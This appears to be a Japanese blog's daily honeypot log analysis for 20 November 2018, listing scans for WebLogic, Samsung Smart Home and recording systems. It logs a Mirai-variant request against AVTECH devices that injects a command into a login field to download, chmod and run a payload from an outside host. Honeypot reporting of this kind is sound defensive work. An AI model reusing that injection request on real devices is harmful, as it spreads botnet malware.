ハニーポットのログ分析(2018/11/20)
WOWhoneypotの2018/11/20(火) (運用167日目)の簡易分析です。
本日の総アクセス件数は 66件です。
主なアクセスは以下です。
・Weblogicの脆弱性(CVE-2018-3252)に対する調査行為:12件
→5日連続です。
・(新規)Samsung Smart Homeの調査:1件
→アクセス内容は以下です。
GET /ezon/login.do HTTP/1.1
Host: 210.140.82.234
他のハニーポッターやアクセスログを公開しているサイト等でも観測されています。
対象のパスについて調べたところ、以下の様なサイトがヒットしました。
https://urlquery.net/report/1a01a5ab-9a55-4da0-b251-377e80a6926f
実際のページで日本語に翻訳したところ、以下となります。
Samsung製のSmartHomeの管理サーバのようです。主に韓国で使われているようです。
ボットネット化される対象ということ以上に、家のセキュリティコントロールを奪われる可能性があることは非常に危険と感じます。
本日のドメイン名でのアクセスは以下です。
4 GET /
1 GET /robots.txt
本日のハンティングログは以下です。
1 2018-11-20 wget hxxp://209.141.33.119/avtechsh
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
43 | 2018-11-20 | アクセス | GET / |
12 | 2018-11-20 | Weblogicの脆弱性(CVE-2018-3252)に対する調査行為 | GET /bea_wls_deployment_internal |
2 | 2018-11-20 | 不正中継の調査 | GET hxxp://www.baidu.com/ |
2 | 2018-11-20 | 不正中継の調査 | CONNECT www.baidu.com:443 |
1 | 2018-11-20 | 調査 | OPTIONS * |
1 | 2018-11-20 | 調査 | HEAD / |
1 | 2018-11-20 | クローリング | GET /robots.txt |
1 | 2018-11-20 | 録画予約システムfoltia ANIME LOCKERの調査 | GET /foltia/ |
1 | 2018-11-20 | Samsung Smart Homeの調査 | GET /ezon/login.do |
1 | 2018-11-20 | 録画予約システムepgrecの調査 | GET /epgrec/do-record.sh |
1 | 2018-11-20 | AVTECHの脆弱性を突くMirai亜種の攻撃 | GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin |
以上です。